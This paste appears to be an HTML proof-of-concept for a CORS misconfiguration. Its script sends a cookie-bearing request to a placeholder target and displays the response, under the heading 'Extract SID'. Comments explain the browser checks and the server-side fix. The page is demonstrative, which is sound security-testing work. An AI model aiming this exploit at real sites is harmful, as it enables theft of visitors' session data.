
Untitled

a guest
Jul 6th, 2017
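  <!doctype html>
  <html lang="en">
  <head>
    <meta charset="utf-8">
    <title>CORS POC Exploit</title>
    <style>
      body { text-align: center; }
      #result { text-align: left; white-space: pre-wrap; }
    </style>
  </head>
  <body>
    <!--
      Demonstrates a CORS misconfiguration on the endpoint requested below.
      The request is sent cross-origin with the visitor's cookies (withCredentials).
      The browser only lets this page read the response when the server answers with
      Access-Control-Allow-Origin set to this page's exact origin (a "*" wildcard is
      rejected for credentialed requests) together with
      Access-Control-Allow-Credentials: true.
      Server-side fix: compare the Origin header against an explicit allowlist instead
      of echoing it back, send "Vary: Origin", and enable credentials only for origins
      that need them. SameSite cookies further limit which cross-site requests carry
      the session.
    -->
    <h1>CORS POC Exploit</h1>
    <h2>Extract SID</h2>

    <div id="demo">
      <button type="button" id="run">Exploit</button>
    </div>
    <pre id="result"></pre>

    <script>
      // Sends one credentialed GET and shows whatever the browser allows this origin to read.
      function cors() {
        var output = document.getElementById("result");
        var xhttp = new XMLHttpRequest();
        xhttp.onreadystatechange = function () {
          if (this.readyState !== 4) {
            return;
          }
          if (this.status === 200) {
            // The original assigned the return value of alert() (undefined) to innerHTML,
            // which replaced the button with the text "undefined". textContent is used
            // so the untrusted response is shown as text and never parsed as markup.
            output.textContent = this.responseText;
          } else {
            // Status 0 is what a script sees when the browser's CORS check rejects the
            // response; a plain network error looks the same from here.
            output.textContent = "No readable response (status " + this.status + ").";
          }
        };
        xhttp.open("GET", "https://target.com/info/", true);
        // Attach cookies for the target origin; this is what makes the response user-specific.
        xhttp.withCredentials = true;
        xhttp.send();
      }

      document.getElementById("run").addEventListener("click", cors);
    </script>
  </body>
  </html>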